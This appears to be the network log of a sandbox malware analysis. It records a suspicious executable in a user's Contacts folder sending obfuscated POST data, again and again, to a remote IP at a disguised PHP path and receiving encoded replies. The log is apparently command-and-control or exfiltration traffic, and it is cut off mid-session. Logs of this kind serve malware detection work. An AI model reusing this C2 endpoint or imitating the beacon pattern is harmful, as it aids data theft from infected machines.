                                                            28192.168.2.54974177.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:46.303026915 CET252OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:46.500907898 CET253INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:46.507325888 CET255OUTData Raw: 57 5e 5d 5a 5e 59 5a 50 5d 57 55 57 55 5d 57 5b 50 5b 58 42 56 53 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W^]Z^YZP]WUWU]W[P[XBVSW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*^*?].R=U;Z8$&#:!Y+3"P&02:]"Y<,->&G''^)+
                                                            Nov 21, 2023 04:47:46.712269068 CET256INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:46 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            29192.168.2.54974277.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:47.052269936 CET256OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:47.251118898 CET257INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:47.251475096 CET259OUTData Raw: 52 5f 58 5c 5b 53 5f 5d 5d 57 55 57 55 5d 57 56 50 58 58 45 56 5f 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_X\[S_]]WUWU]WVPXXEV_WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>(+89)3+,*7*?0:'=3W::^<#Y,&G''^)+
                                                            Nov 21, 2023 04:47:47.460270882 CET259INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:47 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2977.91.124.10180192.168.2.549742C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:47.052269936 CET256OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:47.251118898 CET257INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:47.251475096 CET259OUTData Raw: 52 5f 58 5c 5b 53 5f 5d 5d 57 55 57 55 5d 57 56 50 58 58 45 56 5f 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_X\[S_]]WUWU]WVPXXEV_WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>(+89)3+,*7*?0:'=3W::^<#Y,&G''^)+
                                                            Nov 21, 2023 04:47:47.460270882 CET259INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:47 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            3192.168.2.54971577.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:28.130729914 CET154OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:28.329854012 CET155INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:28.330218077 CET157OUTData Raw: 52 5a 5d 5a 5b 53 5f 5a 5d 57 55 57 55 59 57 50 50 5a 58 49 56 54 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZ]Z[S_Z]WUWUYWPPZXIVTW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$);)^?!* 86\4\)( !'==0V!-89+?;8&G''^)
                                                            Nov 21, 2023 04:47:28.534405947 CET158INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:28 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            377.91.124.10180192.168.2.549715C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:28.130729914 CET154OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:28.329854012 CET155INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:28.330218077 CET157OUTData Raw: 52 5a 5d 5a 5b 53 5f 5a 5d 57 55 57 55 59 57 50 50 5a 58 49 56 54 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZ]Z[S_Z]WUWUYWPPZXIVTW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$);)^?!* 86\4\)( !'==0V!-89+?;8&G''^)
                                                            Nov 21, 2023 04:47:28.534405947 CET158INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:28 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            30192.168.2.54974377.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:47.785492897 CET260OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:47.982127905 CET260INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:47.982362986 CET263OUTData Raw: 57 59 5d 5b 5b 5c 5f 5b 5d 57 55 57 55 5d 57 56 50 52 58 43 56 52 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WY][[\_[]WUWU]WVPRXCVRWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*82+]&) /2["*1?0:W&..S'#&-]=(78&G''^)+
                                                            Nov 21, 2023 04:47:48.186844110 CET263INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:47 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            3077.91.124.10180192.168.2.549743C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:47.785492897 CET260OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:47.982127905 CET260INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:47.982362986 CET263OUTData Raw: 57 59 5d 5b 5b 5c 5f 5b 5d 57 55 57 55 5d 57 56 50 52 58 43 56 52 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WY][[\_[]WUWU]WVPRXCVRWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*82+]&) /2["*1?0:W&..S'#&-]=(78&G''^)+
                                                            Nov 21, 2023 04:47:48.186844110 CET263INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:47 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            31192.168.2.54974477.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:48.504776955 CET264OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:48.706068993 CET264INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:48.706363916 CET267OUTData Raw: 57 50 5d 5c 5b 53 5a 51 5d 57 55 57 55 56 57 54 50 5a 58 49 56 55 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WP]\[SZQ]WUWUVWTPZXIVUWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=^1<1>3'_/5 95?3P'[>' *:86?Z$/&G''^)
                                                            Nov 21, 2023 04:47:48.910502911 CET267INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:48 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            3177.91.124.10180192.168.2.549744C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:48.504776955 CET264OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:48.706068993 CET264INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:48.706363916 CET267OUTData Raw: 57 50 5d 5c 5b 53 5a 51 5d 57 55 57 55 56 57 54 50 5a 58 49 56 55 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WP]\[SZQ]WUWUVWTPZXIVUWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=^1<1>3'_/5 95?3P'[>' *:86?Z$/&G''^)
                                                            Nov 21, 2023 04:47:48.910502911 CET267INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:48 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            32192.168.2.54974577.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:49.116487980 CET268OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:49.315845013 CET269INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:49.316200972 CET270OUTData Raw: 57 5b 58 5d 5e 5d 5a 5e 5d 57 55 57 55 57 57 50 50 52 58 48 56 5e 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W[X]^]Z^]WUWUWWPPRXHV^WR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)+.+9>33[8$ 5]?9'="'V>T-;(?;]8&G''^)
                                                            Nov 21, 2023 04:47:49.521035910 CET273INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:49 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 21 04 25 2f 0d 05 23 20 2b 56 3c 04 26 09 2d 10 00 40 3c 0a 21 11 26 04 28 5a 24 17 2a 0b 2b 59 38 5c 33 17 2c 1c 34 26 30 59 2a 1a 21 5a 0c 1d 25 03 21 3b 30 0f 28 07 23 04 3c 2d 06 5f 25 1f 01 58 28 00 05 16 23 33 01 5a 32 30 3f 09 2e 2f 2a 07 2e 28 3d 19 32 3c 2e 58 34 17 23 5f 0c 14 27 50 22 32 23 5b 23 0e 00 1c 22 34 2b 04 23 24 06 0a 24 13 24 55 31 3b 21 59 3c 16 0a 52 27 37 0a 51 33 29 20 0c 25 39 23 55 28 2a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: !%/# +V<&-@<!&(Z$*+Y8\3,4&0Y*!Z%!;0(#<-_%X(#3Z20?./*.(=2<.X4#_'P"2#[#"4+#$$$U1;!Y<R'7Q3) %9#U(*&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            3277.91.124.10180192.168.2.549745C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:49.116487980 CET268OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:49.315845013 CET269INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:49.316200972 CET270OUTData Raw: 57 5b 58 5d 5e 5d 5a 5e 5d 57 55 57 55 57 57 50 50 52 58 48 56 5e 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W[X]^]Z^]WUWUWWPPRXHV^WR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)+.+9>33[8$ 5]?9'="'V>T-;(?;]8&G''^)
                                                            Nov 21, 2023 04:47:49.521035910 CET273INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:49 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 21 04 25 2f 0d 05 23 20 2b 56 3c 04 26 09 2d 10 00 40 3c 0a 21 11 26 04 28 5a 24 17 2a 0b 2b 59 38 5c 33 17 2c 1c 34 26 30 59 2a 1a 21 5a 0c 1d 25 03 21 3b 30 0f 28 07 23 04 3c 2d 06 5f 25 1f 01 58 28 00 05 16 23 33 01 5a 32 30 3f 09 2e 2f 2a 07 2e 28 3d 19 32 3c 2e 58 34 17 23 5f 0c 14 27 50 22 32 23 5b 23 0e 00 1c 22 34 2b 04 23 24 06 0a 24 13 24 55 31 3b 21 59 3c 16 0a 52 27 37 0a 51 33 29 20 0c 25 39 23 55 28 2a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: !%/# +V<&-@<!&(Z$*+Y8\3,4&0Y*!Z%!;0(#<-_%X(#3Z20?./*.(=2<.X4#_'P"2#[#"4+#$$$U1;!Y<R'7Q3) %9#U(*&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            3377.91.124.10180192.168.2.549746C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:49.238934040 CET269OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:49.436714888 CET270INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:49.436917067 CET273OUTData Raw: 52 5c 58 5f 5e 5e 5a 51 5d 57 55 57 55 57 57 5a 50 5c 58 45 56 52 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R\X_^^ZQ]WUWUWWZP\XEVRWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$==+8&V=(;'*75?509& :-(</\8.&G''^)
                                                            Nov 21, 2023 04:47:49.643173933 CET274INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:49 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            33192.168.2.54974677.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:49.238934040 CET269OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:49.436714888 CET270INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:49.436917067 CET273OUTData Raw: 52 5c 58 5f 5e 5e 5a 51 5d 57 55 57 55 57 57 5a 50 5c 58 45 56 52 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
